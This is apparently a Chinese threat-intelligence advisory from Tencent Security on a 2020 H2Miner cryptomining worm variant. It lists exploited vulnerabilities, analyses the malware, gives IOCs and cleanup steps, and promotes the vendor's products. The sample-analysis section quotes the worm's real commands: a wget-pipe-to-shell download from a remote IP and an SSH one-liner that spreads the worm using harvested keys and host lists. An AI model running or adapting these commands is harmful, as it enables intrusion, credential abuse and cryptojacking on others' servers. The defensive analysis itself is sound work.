Linux服务器遭遇挖矿蠕虫攻击,已有数千台服务器中招

2020-07-30 18:52:08
腾讯安全威胁情报中心捕获H2Miner挖矿蠕虫新变种。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危漏洞入侵Linux系统,并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心预估已有数千台服务器中招,腾讯安全专家建议相关企业尽快排查服务器被入侵的情况,及时清除H2Miner挖矿蠕虫病毒。

一、概述

腾讯安全威胁情报中心捕获H2Miner挖矿蠕虫新变种。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危漏洞入侵Linux系统,并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心预估已有数千台服务器中招,腾讯安全专家建议相关企业尽快排查服务器被入侵的情况,及时清除H2Miner挖矿蠕虫病毒。

腾讯安全威胁情报中心本次捕获的H2Miner挖矿蠕虫样本会下载恶意脚本及恶意程序进行挖矿牟利,横向扫描扩大攻击面并维持与远程服务器(C2)通信,令服务器变成黑客控制的肉鸡。同时,具有卸载云服务器安全软件、删除云服务器镜像的能力,会给企业云服务器安全带来严重影响。

H2Miner挖矿蠕虫利用的高危漏洞包括:

Redis未授权RCE

Solr dataimport RCE(CVE-2019-0193)

Hadoop Yarn REST API未授权RCE(CVE-2017-15718)

Docker Remote API未授权RCE

ThinkPHP5 RCE

Confluence 未授权RCE(CVE-2019-3396)

SaltStack RCECVE-2020-11651

等多个Web应用漏洞。

此次H2Miner变种更新了C2服务器地址,在横向移动时会从/.ssh/config, .bash_history, /.ssh/known_hosts等多个文件中搜索目标机器和认证信息,并利用搜索得到的userlisthostlistkeylistsshports进行组合尝试爆破登陆,从而扩大其攻击范围。

腾讯安全系列产品已针对H2Miner挖矿蠕虫病毒应急响应,建议相关企业参考如下清单加以排查:

应用

场景

安全产品

解决方案

腾讯T-Sec

威胁情报云查服务

SaaS

1H2Miner黑产团伙相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1H2Miner黑产团伙相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生安全

防护

云防火墙

Cloud FirewallCFW

基于网络流量进行威胁检测与主动拦截,已支持:

1H2Miner关联的IOCs已支持识别检测;

2H2MinerC2服务器通信协议已支持检测;

有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw

腾讯T-Sec 漏洞扫描服务

Cloud Workload ProtectionCWP

腾讯T-Sec漏洞扫描服务支持自动探测企业网络资产是否存在H2Miner黑产团伙所利用的高危漏洞,并指导修复。

更多信息可参考:

https://cloud.tencent.com/product/vss

腾讯T-Sec  主机安全

(腾讯云镜,Cloud Workload ProtectionCWP

1)腾讯云镜已支持查杀H2Miner相关木马程序;

2)腾讯云镜已支持以下漏洞检测:

Apache Solr dataimport远程代码执行漏洞(CVE-2019-0193) Confluence 未授权RCE(CVE-2019-3396)漏洞;

ThinkPHP远程代码执行漏洞;SaltStack远程命令执行漏洞(CVE-2020-11651)

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

腾讯T-Sec 安全运营中心

基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

非云企业安全防护

腾讯T-Sec

高级威胁检测系统

(腾讯御界)

1)已支持通过协议检测H2Miner木马与服务器的网络通信;

2)已支持以下漏洞利用的检测:

SaltStack远程命令执行漏洞(CVE-2020-11651)

Confluence未授权远程代码执行漏洞(CVE-2019-3396)

ThinkPHP远程代码执行漏洞

Apache Solr dataimport远程代码执行漏洞(CVE-2019-0193)

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

腾讯T-Sec终端安全管理系统(御点)

1)可查杀H2Miner团伙入侵释放的木马程序;

腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html

更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/

二、样本分析

Docker是一个开源的应用容器引擎,开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。Docker swarm docker官方提供,是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展。使用docker swarm的时候,管理的docker 节点上会开放一个TCP端口2375(或2376)。

攻击者利用未受保护的开放Docker API端口进行攻击,并执行恶意命令:

wget -q -O – http[:]//93.189.43.3/d.sh | sh

d.sh执行以下操作:

1.     禁用SELINUX并清除系统日志:echo SELINUX=disabled >/etc/selinux/config

2.     卸载阿里云骑士和腾讯云镜;

3.     清除竞品挖矿木马;

4.     杀死正在运行的恶意Docker容器并删除它们的映像;

5.     下载恶意程序“kinsing”并运行;

6.     通过crontab定时任务每分钟下载和执行shell脚本;

7.     删除竞品挖矿木马的crontab定时任务。

下载得到的kinsing采用Golang编写,被编译为Linux平台可执行程序,主要有以下功能:

1.下载文件并执行;

2.启动和维持挖矿程序;

3.C&C服务器通信,接收并执行远程命令;

3.利用masscan对外扫描;

4.针对redis服务进行爆破攻击;

5.下载shell脚本http[:]//93.189.43.3/spre.sh,以进行横向移动。


受影响的主机会以http的方式与C&C服务器185.154.53.140进行通信,其中肉鸡的信息在http头部中标识。


Kinsing释放门罗币挖矿木马到/tmp/kdevtmpfsi,然后启动连接矿池xmr-eu1.nanopool.org挖矿,配置中使用门罗币钱包为:

46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb

挖矿使用矿池和钱包与腾讯安全此前捕获到的版本(H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿,已获利370万元https://mp.weixin.qq.com/s/eLnQxa_hXxhNhyquOThW7Q)中使用的相同。



横向移动

Spre.sh是用于在网络中横向传播H2Minershell脚本。为了发现攻击目标并找与其相对应的身份验证的信息,脚本会从 /.ssh/config, .bash_history, /.ssh/known_hosts进行搜索和匹配。

利用收集到的信息,恶意脚本尝试通过SSH连接到每个主机,使用每个可能的用户和密钥组合进行爆破登陆,以便在网络中的其他主机或容器上下载和运行shell脚本Spr.shspr.sh与最初攻击时的d.sh相同。

以下SSH命令用于在网络中传播H2Miner

ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http[:]//93.189.43.3/spr.sh|sh; sudo wget -q -O - http[:]//93.189.43.3/spr.sh|sh;"


三、手动清除H2Miner建议:

1、 查找路径为/tmp/kinsing/tmp/kinsing2/tmp/kdevtmpfsi的进程,将其kill掉并删除对应的文件;

2、 查找crontab任务中包含“195.3.146.118”的相关项并删除。

IOCs

IP

195.3.146.118

142.44.191.122

185.92.74.42

217.12.221.244

93.189.43.3

185.154.53.140

Md5

kdevtmpfsi

8c6681daba966addd295ad89bf5146af

kinsing

52ca5bc47c84a748d2b349871331d36a

a.sh

e3af308c4a4130dd77dc5772d801ebab

cron.sh

bd405b37e69799492a58a50f5efc2725

d.sh

be17040e1a4eaf7e2df8c0273ff2dfd2

ex.sh

7f469ccecbf9d0573f0efd456e8e63a7

h2.sh

1b34c5bb3a06c4439b5da77c49f14cf7

j.sh

41640173ddb6a207612ee052b48dd8be

lf.sh

bac660c7aa23f4fda6c699c75b4b89f1

p.sh

e040303652c05dbf6469c9c3ce68031a

pa.sh

18dc6621299b855793bdeaad8ef5af23

s.sh

1c489a326a4d37fbf02680bbd6f38b4f

spr.sh

255779cf6134f3ac5133f04868e3956c

spre.sh

639d87d54aa57371cc0bf82409503311

t.sh

ae9017bbeac57bc4de1ac5f59d59c519

tf.sh

831093a5a825ab096c2fc73a7a52bbf1

al.sh

d06e2a3f52043c3a3c3ecf1f406b8241

URL

https[:]//bitbucket.org/tromdiga1/git/raw/master/kinsing

https[:]//bitbucket.org/tromdiga1/git/raw/master/for

http[:]//93.189.43.3/kinsing

http[:]//93.189.43.3/kinsing2

http[:]//93.189.43.3/spr.sh

http[:]//93.189.43.3/spre.sh

http[:]//93.189.43.3/a.sh

http[:]//93.189.43.3/cron.sh

http[:]//93.189.43.3/d.sh

http[:]//93.189.43.3/ex.sh

http[:]//93.189.43.3/h2.sh

http[:]//93.189.43.3/j.sh

http[:]//93.189.43.3/lf.sh

http[:]//93.189.43.3/p.sh

http[:]//93.189.43.3/pa.sh

http[:]//93.189.43.3/s.sh

http[:]//93.189.43.3/t.sh

http[:]//93.189.43.3/tf.sh

http[:]//93.189.43.3/al.sh

参考链接:

http://blog.nsfocus.net/docker-remote-api-unauthorized-access-vulnerability/

H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿,已获利370万元

https://mp.weixin.qq.com/s/eLnQxa_hXxhNhyquOThW7Q

最新资讯